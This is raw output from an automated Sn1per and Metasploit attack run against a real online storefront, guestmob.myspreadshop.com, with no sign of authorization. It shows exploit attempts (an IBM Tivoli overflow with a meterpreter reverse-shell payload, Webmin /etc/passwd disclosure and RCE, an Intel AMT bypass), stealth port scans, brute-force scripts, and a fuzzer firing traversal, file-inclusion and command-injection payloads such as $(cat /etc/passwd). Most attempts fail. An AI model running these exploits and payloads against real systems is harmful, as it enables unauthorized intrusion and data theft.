[*] guestmob.myspreadshop.com:1099 - Scanned 3 of 8 hosts (37% complete)
[-] 151.101.194.137:1099 - Failed to negotiate RMI protocol
[*] guestmob.myspreadshop.com:1099 - Scanned 4 of 8 hosts (50% complete)
[*] guestmob.myspreadshop.com:1099 - Scanned 5 of 8 hosts (62% complete)
[*] guestmob.myspreadshop.com:1099 - Scanned 6 of 8 hosts (75% complete)
[*] guestmob.myspreadshop.com:1099 - Scanned 7 of 8 hosts (87% complete)
[*] guestmob.myspreadshop.com:1099 - Scanned 8 of 8 hosts (100% complete)
[*] Auxiliary module execution completed
+ -- --=[Port 9495 opened... running tests...
====================================================================================•x[2022-02-21](15:52)x•
RUNNING IBM TIVOLI ENDPOINT OVERFLOW EXPLOIT
====================================================================================•x[2022-02-21](15:52)x•
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
RHOST => guestmob.myspreadshop.com
RHOSTS => guestmob.myspreadshop.com
SSL => false
LHOST => 127.0.0.1
LPORT => 4444
[*] Exploiting target 151.101.2.137
[*] Started reverse TCP handler on 10.83.0.8:4444
[*] Trying target Automatic...
[*] Sending request to 151.101.2.137:9495
[*] Exploiting target 151.101.66.137
[*] Started reverse TCP handler on 10.83.0.8:4444
[*] Trying target Automatic...
[*] Sending request to 151.101.66.137:9495
[*] Exploiting target 151.101.130.137
[*] Started reverse TCP handler on 10.83.0.8:4444
[*] Trying target Automatic...
[*] Sending request to 151.101.130.137:9495
[*] Exploiting target 151.101.194.137
[*] Started reverse TCP handler on 10.83.0.8:4444
[*] Trying target Automatic...
[*] Sending request to 151.101.194.137:9495
[*] Exploiting target 2a04:4e42:600::649
[*] Started reverse TCP handler on 10.83.0.8:4444
[*] Trying target Automatic...
[*] Sending request to 2a04:4e42:600::649:9495
[*] Exploiting target 2a04:4e42::649
[*] Started reverse TCP handler on 10.83.0.8:4444
[*] Trying target Automatic...
[*] Sending request to 2a04:4e42::649:9495
[*] Exploiting target 2a04:4e42:200::649
[*] Started reverse TCP handler on 10.83.0.8:4444
[*] Trying target Automatic...
[*] Sending request to 2a04:4e42:200::649:9495
[*] Exploiting target 2a04:4e42:400::649
[*] Started reverse TCP handler on 10.83.0.8:4444
[*] Trying target Automatic...
[*] Sending request to 2a04:4e42:400::649:9495
[*] Exploit completed, but no session was created.
+ -- --=[Port 10000 opened... running tests...
====================================================================================•x[2022-02-21](15:53)x•
RUNNING WEBMIN FILE DISCLOSURE EXPLOIT
====================================================================================•x[2022-02-21](15:53)x•
RHOST => guestmob.myspreadshop.com
RHOSTS => guestmob.myspreadshop.com
[*] Running module against 151.101.2.137
[*] Attempting to retrieve /etc/passwd...
[*] No response from the server
[*] Running module against 151.101.66.137
[*] Attempting to retrieve /etc/passwd...
[*] No response from the server
[*] Running module against 151.101.130.137
[*] Attempting to retrieve /etc/passwd...
[*] No response from the server
[*] Running module against 151.101.194.137
[*] Attempting to retrieve /etc/passwd...
[*] No response from the server
[*] Running module against 2a04:4e42:400::649
[*] Attempting to retrieve /etc/passwd...
[*] No response from the server
[*] Running module against 2a04:4e42:600::649
[*] Attempting to retrieve /etc/passwd...
[*] No response from the server
[*] Running module against 2a04:4e42::649
[*] Attempting to retrieve /etc/passwd...
[*] No response from the server
[*] Running module against 2a04:4e42:200::649
[*] Attempting to retrieve /etc/passwd...
[*] No response from the server
[*] Auxiliary module execution completed
[!] Changing the SSL option's value may require changing RPORT!
SSL => true
[*] Running module against 151.101.2.137
[*] Attempting to retrieve /etc/passwd...
[*] No response from the server
[*] Running module against 151.101.66.137
[*] Attempting to retrieve /etc/passwd...
[*] No response from the server
[*] Running module against 151.101.130.137
[*] Attempting to retrieve /etc/passwd...
[*] No response from the server
[*] Running module against 151.101.194.137
[*] Attempting to retrieve /etc/passwd...
[*] No response from the server
[*] Running module against 2a04:4e42:200::649
[*] Attempting to retrieve /etc/passwd...
[*] No response from the server
[*] Running module against 2a04:4e42:400::649
[*] Attempting to retrieve /etc/passwd...
[*] No response from the server
[*] Running module against 2a04:4e42:600::649
[*] Attempting to retrieve /etc/passwd...
[*] No response from the server
[*] Running module against 2a04:4e42::649
[*] Attempting to retrieve /etc/passwd...
[*] No response from the server
[*] Auxiliary module execution completed
====================================================================================•x[2022-02-21](15:55)x•
RUNNING CVE-2019-15107 WEBMIN <= 1.920 RCE EXPLOIT
====================================================================================•x[2022-02-21](15:55)x•
[-] No results from search
[-] Failed to load module: exploit/web/defcon_webmin_unauth_rce
LHOST => 127.0.0.1
LPORT => 4444
RHOST => guestmob.myspreadshop.com
RHOSTS => guestmob.myspreadshop.com
[-] Unknown command: run
[!] Changing the SSL option's value may require changing RPORT!
SSL => True
[-] Unknown command: run
+ -- --=[Port 16992 opened... running tests...
====================================================================================•x[2022-02-21](15:55)x•
RUNNING INTEL AMT AUTH BYPASS EXPLOIT
====================================================================================•x[2022-02-21](15:55)x•
RHOSTS => guestmob.myspreadshop.com
[*] Scanned 1 of 8 hosts (12% complete)
[*] Scanned 2 of 8 hosts (25% complete)
[*] Scanned 3 of 8 hosts (37% complete)
[*] Scanned 4 of 8 hosts (50% complete)
[*] Scanned 5 of 8 hosts (62% complete)
[*] Scanned 6 of 8 hosts (75% complete)
[*] Scanned 7 of 8 hosts (87% complete)
[*] Scanned 8 of 8 hosts (100% complete)
[*] Auxiliary module execution completed
+ -- --=[Port 27017 closed... skipping.
+ -- --=[Port 27018 closed... skipping.
+ -- --=[Port 27019 closed... skipping.
+ -- --=[Port 28017 opened... running tests...
====================================================================================•x[2022-02-21](15:56)x•
RUNNING NMAP SCRIPTS
====================================================================================•x[2022-02-21](15:56)x•
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-21 15:56 EST
NSE: Loaded 49 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 15:56
Completed NSE at 15:56, 0.00s elapsed
Initiating NSE at 15:56
Completed NSE at 15:56, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 15:56
Completed Parallel DNS resolution of 1 host. at 15:56, 0.07s elapsed
Initiating SYN Stealth Scan at 15:56
Scanning guestmob.myspreadshop.com (151.101.194.137) [1 port]
Discovered open port 28017/tcp on 151.101.194.137
Completed SYN Stealth Scan at 15:56, 0.11s elapsed (1 total ports)
Initiating Service scan at 15:56
Scanning 1 service on guestmob.myspreadshop.com (151.101.194.137)
Completed Service scan at 15:59, 159.03s elapsed (1 service on 1 host)
NSE: Script scanning 151.101.194.137.
Initiating NSE at 15:59
Completed NSE at 15:59, 15.39s elapsed
Initiating NSE at 15:59
Completed NSE at 15:59, 10.10s elapsed
Nmap scan report for guestmob.myspreadshop.com (151.101.194.137)
Host is up (0.082s latency).
Other addresses for guestmob.myspreadshop.com (not scanned): 151.101.2.137 151.101.66.137 151.101.130.137 2a04:4e42::649 2a04:4e42:200::649 2a04:4e42:400::649 2a04:4e42:600::649
PORT STATE SERVICE VERSION
28017/tcp open mongod?
|_mongodb-databases: ERROR: Script execution failed (use -d to debug)
|_mongodb-info: ERROR: Script execution failed (use -d to debug)
|_mongodb-brute: ERROR: Script execution failed (use -d to debug)
NSE: Script Post-scanning.
Initiating NSE at 15:59
Completed NSE at 15:59, 0.00s elapsed
Initiating NSE at 15:59
Completed NSE at 15:59, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 185.30 seconds
Raw packets sent: 1 (44B) | Rcvd: 1 (44B)
+ -- --=[Port 49180 opened... running tests...
====================================================================================•x[2022-02-21](15:59)x•
RUNNING JAVA RMI SCANNER
====================================================================================•x[2022-02-21](15:59)x•
RHOSTS => guestmob.myspreadshop.com
RPORT => 49180
[-] 151.101.66.137:49180 - Failed to negotiate RMI protocol
[*] guestmob.myspreadshop.com:49180 - Scanned 1 of 8 hosts (12% complete)
[-] 151.101.130.137:49180 - Failed to negotiate RMI protocol
[*] guestmob.myspreadshop.com:49180 - Scanned 2 of 8 hosts (25% complete)
[-] 151.101.194.137:49180 - Failed to negotiate RMI protocol
[*] guestmob.myspreadshop.com:49180 - Scanned 3 of 8 hosts (37% complete)
[-] 151.101.2.137:49180 - Failed to negotiate RMI protocol
[*] guestmob.myspreadshop.com:49180 - Scanned 4 of 8 hosts (50% complete)
[*] guestmob.myspreadshop.com:49180 - Scanned 5 of 8 hosts (62% complete)
[*] guestmob.myspreadshop.com:49180 - Scanned 6 of 8 hosts (75% complete)
[*] guestmob.myspreadshop.com:49180 - Scanned 7 of 8 hosts (87% complete)
[*] guestmob.myspreadshop.com:49180 - Scanned 8 of 8 hosts (100% complete)
[*] Auxiliary module execution completed
====================================================================================•x[2022-02-21](16:00)x•
SCANNING ALL HTTP PORTS
====================================================================================•x[2022-02-21](16:00)x•
[*] Loaded configuration file from /usr/share/sniper/sniper.conf [OK]
[*] Loaded configuration file from /root/.sniper.conf [OK]
[*] Saving loot to /usr/share/sniper/loot/workspace/guestmob.myspreadshop.com [OK]
[*] Scanning guestmob.myspreadshop.com [OK]
[*] Saving loot to /usr/share/sniper/loot/workspace/guestmob.myspreadshop.com [OK]
[*] Loaded configuration file from /usr/share/sniper/sniper.conf [OK]
[*] Loaded configuration file from /root/.sniper.conf [OK]
[*] Saving loot to /usr/share/sniper/loot/workspace/guestmob.myspreadshop.com [OK]
[*] Scanning guestmob.myspreadshop.com [OK]
____
_________ / _/___ ___ _____
/ ___/ __ \ / // __ \/ _ \/ ___/
(__ ) / / // // /_/ / __/ /
/____/_/ /_/___/ .___/\___/_/
/_/
+ -- --=[https://sn1persecurity.com
+ -- --=[Sn1per v9.0 by @xer0dayz
; ,
,; '.
;: :;
:: ::
:: ::
': :
:. :
;' :: :: '
.' '; ;' '.
:: :; ;: ::
; :;. ,;: ::
:; :;: ,;" ::
::. ':; ..,.; ;:' ,.;:
"'"... '::,::::: ;: .;.;""'
'"""....;:::::;,;.;"""
.:::.....'"':::::::'",...;::::;.
;:' '""'"";.,;:::::;.'"""""" ':;
::' ;::;:::;::.. :;
:: ,;:::::::::::;:.. ::
;' ,;;:;::::::::::::::;";.. ':.
:: ;:" ::::::"""':::::: ": ::
:. :: ::::::; ::::::: : ;
; :: ::::::: ::::::: : ;
' :: ::::::....:::::' ,: '
' :: :::::::::::::" ::
:: ':::::::::"' ::
': """""""' ::
:: ;:
':; ;:"
-hrr- '; ,;'
"' '"
''''
====================================================================================•x[2022-02-21](16:00)x•
RUNNING TCP PORT SCAN
====================================================================================•x[2022-02-21](16:00)x•
+ -- --=[Port 80 opened... running tests...
====================================================================================•x[2022-02-21](16:00)x•
CHECKING HTTP HEADERS AND METHODS
====================================================================================•x[2022-02-21](16:00)x•
HTTP/1.1 301 Moved Permanently
Server: Varnish
Retry-After: 0
Access-Control-Allow-Origin: *
Content-Length: 0
Accept-Ranges: bytes
Date: Tue, 22 Feb 2022 03:00:46 GMT
Via: 1.1 varnish
Connection: close
X-Served-By: cache-sna10727-LGB
X-Cache: HIT
X-Cache-Hits: 0
X-Timer: S1645498847.830086,VS0,VE1
X-Trace-Id: f8b4d865656440de6971270c17469a6a69d7ac43
X-Application: shop
X-DNS-Prefetch-Control: on
Server-Timing: HIT-SYNTH, fastly;desc="Edge time";dur=1
Timing-Allow-Origin: *
Strict-Transport-Security: max-age=604800
location: https://guestmob.myspreadshop.com/
HTTP/1.1 301 Moved Permanently
Server: Varnish
Retry-After: 0
Access-Control-Allow-Origin: *
Content-Length: 0
Accept-Ranges: bytes
Date: Tue, 22 Feb 2022 03:00:47 GMT
Via: 1.1 varnish
Connection: close
X-Served-By: cache-lax10670-LGB
X-Cache: HIT
X-Cache-Hits: 0
X-Timer: S1645498847.057893,VS0,VE0
X-Trace-Id: 245039f0f7d3cf5ee1f9be82da5e031fcfb00d5b
X-Application: shop
X-DNS-Prefetch-Control: on
Server-Timing: HIT-SYNTH, fastly;desc="Edge time";dur=0
Timing-Allow-Origin: *
Strict-Transport-Security: max-age=604800
location: https://guestmob.myspreadshop.com/
HTTP/2 200
access-control-allow-origin: *
access-control-allow-methods: GET, POST, OPTIONS, PUT
access-control-max-age: 600
access-control-allow-headers: X-PINGOTHER,Origin,X-Requested-With,Content-Type,Accept,Accept-Encoding,DNT
cache-control: no-transform, must-revalidate, max-age=0
content-type: text/html;charset=utf-8
x-server-name: sprd-shop03_na1
server: nginx/9.5
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Tue, 22 Feb 2022 03:00:47 GMT
age: 1
x-served-by: cache-dfw18620-DFW, cache-sna10732-LGB
x-cache: MISS, HIT
x-cache-hits: 0, 1
x-timer: S1645498847.388057,VS0,VE1
vary: Accept-Encoding
x-trace-id: 861e0e2801f999c186485442d60837a8863ebb03
x-application: shop
x-dns-prefetch-control: on
server-timing: HIT-CLUSTER, fastly;desc="Edge time";dur=1
timing-allow-origin: *
strict-transport-security: max-age=604800
content-length: 176796
====================================================================================•x[2022-02-21](16:00)x•
DISPLAYING META GENERATOR TAGS
====================================================================================•x[2022-02-21](16:00)x•
====================================================================================•x[2022-02-21](16:00)x•
DISPLAYING COMMENTS
====================================================================================•x[2022-02-21](16:00)x•
====================================================================================•x[2022-02-21](16:00)x•
DISPLAYING SITE LINKS
====================================================================================•x[2022-02-21](16:00)x•
====================================================================================•x[2022-02-21](16:00)x•
CHECKING FOR WAF
====================================================================================•x[2022-02-21](16:00)x•
______
/ \
( W00f! )
\ ____/
,, __ 404 Hack Not Found
|`-.__ / / __ __
/" _/ /_/ \ \ / /
*===* / \ \_/ / 405 Not Allowed
/ )__// \ /
/| / /---` 403 Forbidden
\\/` \ | / _ \
`\ /_\\_ 502 Bad Gateway / / \ \ 500 Internal Error
`_____``-` /_/ \_\
~ WAFW00F : v2.1.0 ~
The Web Application Firewall Fingerprinting Toolkit
[*] Checking http://guestmob.myspreadshop.com
[+] Generic Detection results:
[-] No WAF detected by the generic detection
[~] Number of requests: 7
====================================================================================•x[2022-02-21](16:00)x•
GATHERING HTTP INFO
====================================================================================•x[2022-02-21](16:00)x•
http://guestmob.myspreadshop.com:80 [301 Moved Permanently] Country[UNITED STATES][US], HTTPServer[Varnish], IP[151.101.66.137], RedirectLocation[https://guestmob.myspreadshop.com/], Strict-Transport-Security[max-age=604800], UncommonHeaders[retry-after,access-control-allow-origin,x-served-by,x-cache-hits,x-timer,x-trace-id,x-application,x-dns-prefetch-control,server-timing,timing-allow-origin], Varnish, Via-Proxy[1.1 varnish]
https://guestmob.myspreadshop.com/ [200 OK] Access-Control-Allow-Methods[GET, POST, OPTIONS, PUT], Country[UNITED STATES][US], Email[service@spreadshirt.com], HTML5, HTTPServer[nginx/9.5], IP[151.101.2.137], Open-Graph-Protocol[website], PoweredBy[Pros], Script[application/ld+json], Strict-Transport-Security[max-age=604800], Title[GuestMob], UncommonHeaders[access-control-allow-origin,access-control-allow-methods,access-control-max-age,access-control-allow-headers,x-server-name,x-served-by,x-cache-hits,x-timer,x-trace-id,x-application,x-dns-prefetch-control,server-timing,timing-allow-origin], Via-Proxy[1.1 varnish, 1.1 varnish], nginx[9.5]
====================================================================================•x[2022-02-21](16:01)x•
GATHERING WEB FINGERPRINT
====================================================================================•x[2022-02-21](16:01)x•
Varnish
Nginx 9.5
access-control-max-age: 600
access-control-allow-headers: X-PINGOTHER,Origin,X-Requested-With,Content-Type,Accept,Accept-Encoding,DNT
x-server-name: sprd-shop03_na1
X-Served-By: cache-dfw18669-DFW, cache-sna10735-LGB
X-Trace-Id: 2d407421172e1146eef139a304397177a13c22e5
X-Application: shop
X-DNS-Prefetch-Control: on
Server-Timing: HIT-CLUSTER, fastly;desc="Edge time";dur=1
Timing-Allow-Origin: *
====================================================================================•x[2022-02-21](16:01)x•
SAVING SCREENSHOTS
====================================================================================•x[2022-02-21](16:01)x•
webscreenshot.py version 2.2.1
[+] 1 URLs to be screenshot
[+] 1 actual URLs screenshot
[+] 0 error(s)
====================================================================================•x[2022-02-21](16:01)x•
RUNNING NMAP SCRIPTS
====================================================================================•x[2022-02-21](16:01)x•
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-21 16:01 EST
NSE: Loaded 50 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 16:01
Completed NSE at 16:01, 0.00s elapsed
Initiating NSE at 16:01
Completed NSE at 16:01, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 16:01
Completed Parallel DNS resolution of 1 host. at 16:01, 0.06s elapsed
Initiating SYN Stealth Scan at 16:01
Scanning guestmob.myspreadshop.com (151.101.66.137) [1 port]
Discovered open port 80/tcp on 151.101.66.137
Completed SYN Stealth Scan at 16:01, 0.09s elapsed (1 total ports)
Initiating Service scan at 16:01
Scanning 1 service on guestmob.myspreadshop.com (151.101.66.137)
Completed Service scan at 16:01, 6.15s elapsed (1 service on 1 host)
NSE: Script scanning 151.101.66.137.
Initiating NSE at 16:01
Completed NSE at 16:01, 5.61s elapsed
Initiating NSE at 16:01
Completed NSE at 16:01, 0.55s elapsed
Nmap scan report for guestmob.myspreadshop.com (151.101.66.137)
Host is up (0.081s latency).
Other addresses for guestmob.myspreadshop.com (not scanned): 151.101.130.137 151.101.194.137 151.101.2.137 2a04:4e42:600::649 2a04:4e42::649 2a04:4e42:200::649 2a04:4e42:400::649
PORT STATE SERVICE VERSION
80/tcp open http-proxy Varnish
| http-brute:
|_ Path "/" does not require authentication
NSE: Script Post-scanning.
Initiating NSE at 16:01
Completed NSE at 16:01, 0.00s elapsed
Initiating NSE at 16:01
Completed NSE at 16:01, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.06 seconds
Raw packets sent: 1 (44B) | Rcvd: 1 (44B)
====================================================================================•x[2022-02-21](16:01)x•
RUNNING PASSIVE WEB SPIDER
====================================================================================•x[2022-02-21](16:01)x•
====================================================================================•x[2022-02-21](16:02)x•
FETCHING WAYBACK MACHINE URLS
====================================================================================•x[2022-02-21](16:02)x•
====================================================================================•x[2022-02-21](16:02)x•
FETCHING HACKERTARGET URLS
====================================================================================•x[2022-02-21](16:02)x•
https://www.spreadshop.com/?affiliateid=12833
https://youtube.com/BeOurGuest
https://service.spreadshirt.com/hc/en-us/articles/115000978409/?shop_name=GuestMob&shop_id=100232229&platform=na
https://service.spreadshirt.com/hc/en-us/articles/115000991305/?shop_name=GuestMob&shop_id=100232229&platform=na
https://service.spreadshirt.com/hc/en-us/articles/115000991325/?shop_name=GuestMob&shop_id=100232229&platform=na
https://service.spreadshirt.com/hc/en-us/?shop_name=GuestMob&shop_id=100232229&platform=na
https://service.spreadshirt.com/hc/en-us/articles/115000993925/?shop_name=GuestMob&shop_id=100232229&platform=na
https://youtube.com/BeOurGuest
https://partner.spreadshirt.com/shop-register/?affiliateid=12441
====================================================================================•x[2022-02-21](16:02)x•
FETCHING GUA URLS
====================================================================================•x[2022-02-21](16:02)x•
====================================================================================•x[2022-02-21](16:02)x•
RUNNING ACTIVE WEB SPIDER & APPLICATION SCAN
====================================================================================•x[2022-02-21](16:02)x•
_.._
.' '.
/ __ \
, | >< | ,
. \ \ / / .
\_'--`( )'--'_/
.--'/()'--.
@xer0dayz / /` '' `\ \
| |
\ /
+ -- --=[ https://sn1persecurity.com
+ -- --=[ blackwidow v1.3 by @xer0dayz
_.._
.' '.
/ __ \
, | >< | ,
. \ \ / / .
\_'--`( )'--'_/
.--'/()'--.
@xer0dayz / /` '' `\ \
| |
\ /
+ -- --=[ https://sn1persecurity.com
+ -- --=[ blackwidow v1.3 by @xer0dayz
[+] URL's Discovered:
/usr/share/blackwidow/guestmob.myspreadshop.com_80/guestmob.myspreadshop.com_80-urls-sorted.txt
__________________________________________________________________________________________________
[+] Dynamic URL's Discovered:
/usr/share/blackwidow/guestmob.myspreadshop.com_80/guestmob.myspreadshop.com_80-dynamic-sorted.txt
__________________________________________________________________________________________________
[+] Form URL's Discovered:
/usr/share/blackwidow/guestmob.myspreadshop.com_80/guestmob.myspreadshop.com_80-forms-sorted.txt
__________________________________________________________________________________________________
[+] Unique Dynamic Parameters Discovered:
/usr/share/blackwidow/guestmob.myspreadshop.com_80/guestmob.myspreadshop.com_80-dynamic-unique.txt
__________________________________________________________________________________________________
[+] Sub-domains Discovered:
/usr/share/blackwidow/guestmob.myspreadshop.com_80/guestmob.myspreadshop.com_80-subdomains-sorted.txt
__________________________________________________________________________________________________
[+] Emails Discovered:
/usr/share/blackwidow/guestmob.myspreadshop.com_80/guestmob.myspreadshop.com_80-emails-sorted.txt
__________________________________________________________________________________________________
[+] Phones Discovered:
/usr/share/blackwidow/guestmob.myspreadshop.com_80/guestmob.myspreadshop.com_80-phones-sorted.txt
__________________________________________________________________________________________________
[+] Loot Saved To:
/usr/share/blackwidow/guestmob.myspreadshop.com_80/
__________________________________________________________________________________________________
^[[B ____ _ __ _ __
/ _/___ (_)__ _____/ /| |/ /
/ // __ \ / / _ \/ ___/ __/ /
_/ // / / / / / __/ /__/ /_/ |
/___/_/ /_/_/ /\___/\___/\__/_/|_|
/_____/
--== Inject-X Fuzzer by @xer0dayz ==--
--== https://sn1persecurity.com ==--
>>> http://guestmob.myspreadshop.com:80////checkmate%2C+bitch!?idea=5a4acad55d52cd4721c4a43b [200] [321452]
======================================================================================================
>>> http://guestmob.myspreadshop.com:80////checkmate%2C+bitch!?idea=5a4acad55d52cd4721c4a43b [200] [321452]
======================================================================================================
[D] Fuzzing Parameter: idea=
----------------------------------------------------
[i] Trying Payload: google.com
[i] Trying Payload: //google.com
[i] Trying Payload: https%3A//google.com
[i] Trying Payload: INJECTX
[i] New URL: http://guestmob.myspreadshop.com:80////checkmate%2C+bitch!?idea=INJECTX [200] [300226] [21226]
[+] Reflected Value Detected!
[i] Trying Payload: '
[i] Trying Payload: \
[i] Trying Payload: /..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini
[i] Trying Payload: /..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini%00
[i] Trying Payload: ..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini%00test.htm
[i] Trying Payload: ..%2fWEB-INF%2fweb.xml
[i] Trying Payload: /../../../../../../../../../../../../../../../../../etc/passwd
[i] Trying Payload: /../../../../../../../../../../../../../../../../../etc/passwd%00
[i] Trying Payload: /etc/passwd
[i] Trying Payload: /etc/passwd%00
[i] Trying Payload: C:\boot.ini
[i] Trying Payload: C:\boot.ini%00
[i] Trying Payload: hTtP://tests.arachni-scanner.com/rfi.md5.txt
[i] Trying Payload: hTtP://tests.arachni-scanner.com/rfi.md5.txt%00
[i] Trying Payload: %7B%7B1336%252B1%7D%7D
[i] Trying Payload: 1336%2B1
[i] Trying Payload: %24%28cat%2B/etc/passwd%29
[i] Trying Payload: %24%28sleep%2B10%29
[i] Trying Payload: phpinfo%28%29
[i] Trying Payload: 1336%2B1
[i] Trying Payload: 1336%2B1
______________________________________________________________________________________________________
____ _ __ _ __
/ _/___ (_)__ _____/ /| |/ /
/ // __ \ / / _ \/ ___/ __/ /
_/ // / / / / / __/ /__/ /_/ |
/___/_/ /_/_/ /\___/\___/\__/_/|_|
/_____/
--== Inject-X Fuzzer by @xer0dayz ==--
--== https://sn1persecurity.com ==--
>>> http://guestmob.myspreadshop.com:80//about//accessories+aprons?q=P49 [200] [239421]
======================================================================================================
>>> http://guestmob.myspreadshop.com:80//about//accessories+aprons?q=P49 [200] [239421]
======================================================================================================
[D] Fuzzing Parameter: q=
----------------------------------------------------
[i] Trying Payload: google.com
[i] Trying Payload: //google.com
[i] Trying Payload: https%3A//google.com
[i] Trying Payload: INJECTX
[i] Trying Payload: '
[i] Trying Payload: \
[i] Trying Payload: /..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini
[i] Trying Payload: /..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini%00
[i] Trying Payload: ..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini%00test.htm
[i] Trying Payload: ..%2fWEB-INF%2fweb.xml
[i] Trying Payload: /../../../../../../../../../../../../../../../../../etc/passwd
[i] Trying Payload: /../../../../../../../../../../../../../../../../../etc/passwd%00
[i] Trying Payload: /etc/passwd
[i] Trying Payload: /etc/passwd%00
[i] Trying Payload: C:\boot.ini
[i] Trying Payload: C:\boot.ini%00
[i] Trying Payload: hTtP://tests.arachni-scanner.com/rfi.md5.txt
[i] Trying Payload: hTtP://tests.arachni-scanner.com/rfi.md5.txt%00
[i] Trying Payload: %7B%7B1336%252B1%7D%7D
[i] Trying Payload: 1336%2B1
[i] Trying Payload: %24%28cat%2B/etc/passwd%29
[i] Trying Payload: %24%28sleep%2B10%29
[i] Trying Payload: phpinfo%28%29
[i] Trying Payload: 1336%2B1
[i] Trying Payload: 1336%2B1
______________________________________________________________________________________________________
[-] 151.101.2.137:23 - A network issue has occurred: Connection reset by peer
[*] guestmob.myspreadshop.com:23 - Scanned 1 of 8 hosts (12% complete)
[-] 151.101.66.137:23 - A network issue has occurred: Connection reset by peer
[*] guestmob.myspreadshop.com:23 - Scanned 2 of 8 hosts (25% complete)
[-] 151.101.130.137:23 - A network issue has occurred: Connection reset by peer
[*] guestmob.myspreadshop.com:23 - Scanned 3 of 8 hosts (37% complete)
[-] 151.101.194.137:23 - A network issue has occurred: Connection reset by peer
[*] guestmob.myspreadshop.com:23 - Scanned 4 of 8 hosts (50% complete)
[-] 2a04:4e42:400::649:23 - A network issue has occurred: The host ([2a04:4e42:400::649]:23) was unreachable.
[*] guestmob.myspreadshop.com:23 - Scanned 5 of 8 hosts (62% complete)
[-] 2a04:4e42:600::649:23 - A network issue has occurred: The host ([2a04:4e42:600::649]:23) was unreachable.
[*] guestmob.myspreadshop.com:23 - Scanned 6 of 8 hosts (75% complete)
[-] 2a04:4e42::649:23 - A network issue has occurred: The host ([2a04:4e42::649]:23) was unreachable.
[*] guestmob.myspreadshop.com:23 - Scanned 7 of 8 hosts (87% complete)
[-] 2a04:4e42:200::649:23 - A network issue has occurred: The host ([2a04:4e42:200::649]:23) was unreachable.
[*] guestmob.myspreadshop.com:23 - Scanned 8 of 8 hosts (100% complete)
[*] Auxiliary module execution completed
[*] guestmob.myspreadshop.com:23 - Scanned 1 of 8 hosts (12% complete)
[*] guestmob.myspreadshop.com:23 - Scanned 2 of 8 hosts (25% complete)
[*] guestmob.myspreadshop.com:23 - Scanned 3 of 8 hosts (37% complete)
[*] guestmob.myspreadshop.com:23 - Scanned 4 of 8 hosts (50% complete)
[*] guestmob.myspreadshop.com:23 - Scanned 5 of 8 hosts (62% complete)
[*] guestmob.myspreadshop.com:23 - Scanned 6 of 8 hosts (75% complete)
[*] guestmob.myspreadshop.com:23 - Scanned 7 of 8 hosts (87% complete)
[*] guestmob.myspreadshop.com:23 - Scanned 8 of 8 hosts (100% complete)
[*] Auxiliary module execution completed
[-] 151.101.66.137:23 - A network issue has occurred: Connection reset by peer
[*] guestmob.myspreadshop.com:23 - Scanned 1 of 8 hosts (12% complete)
[-] 151.101.130.137:23 - A network issue has occurred: Connection reset by peer
[*] guestmob.myspreadshop.com:23 - Scanned 2 of 8 hosts (25% complete)
[-] 151.101.194.137:23 - A network issue has occurred: Connection reset by peer
[*] guestmob.myspreadshop.com:23 - Scanned 3 of 8 hosts (37% complete)
[-] 151.101.2.137:23 - A network issue has occurred: Connection reset by peer
[*] guestmob.myspreadshop.com:23 - Scanned 4 of 8 hosts (50% complete)
[-] 2a04:4e42::649:23 - A network issue has occurred: The host ([2a04:4e42::649]:23) was unreachable.
[*] guestmob.myspreadshop.com:23 - Scanned 5 of 8 hosts (62% complete)
[-] 2a04:4e42:200::649:23 - A network issue has occurred: The host ([2a04:4e42:200::649]:23) was unreachable.
[*] guestmob.myspreadshop.com:23 - Scanned 6 of 8 hosts (75% complete)
[-] 2a04:4e42:400::649:23 - A network issue has occurred: The host ([2a04:4e42:400::649]:23) was unreachable.
[*] guestmob.myspreadshop.com:23 - Scanned 7 of 8 hosts (87% complete)
[-] 2a04:4e42:600::649:23 - A network issue has occurred: The host ([2a04:4e42:600::649]:23) was unreachable.
[*] guestmob.myspreadshop.com:23 - Scanned 8 of 8 hosts (100% complete)
[*] Auxiliary module execution completed
+ -- --=[Port 25 closed... skipping.
+ -- --=[Port 53 opened... running tests...
====================================================================================•x[2022-02-21](14:28)x•
RUNNING NMAP SCRIPTS
====================================================================================•x[2022-02-21](14:28)x•
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-21 14:28 EST
NSE: Loaded 64 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 14:28
Completed NSE at 14:28, 0.00s elapsed
Initiating NSE at 14:28
Completed NSE at 14:28, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 14:28
Completed Parallel DNS resolution of 1 host. at 14:28, 0.07s elapsed
Initiating SYN Stealth Scan at 14:28
Scanning guestmob.myspreadshop.com (151.101.194.137) [1 port]
Discovered open port 53/tcp on 151.101.194.137
Completed SYN Stealth Scan at 14:28, 0.08s elapsed (1 total ports)
Initiating Service scan at 14:28
Scanning 1 service on guestmob.myspreadshop.com (151.101.194.137)
Completed Service scan at 14:31, 158.62s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against guestmob.myspreadshop.com (151.101.194.137)
Retrying OS detection (try #2) against guestmob.myspreadshop.com (151.101.194.137)
Initiating Traceroute at 14:31
Completed Traceroute at 14:31, 0.15s elapsed
Initiating Parallel DNS resolution of 1 host. at 14:31
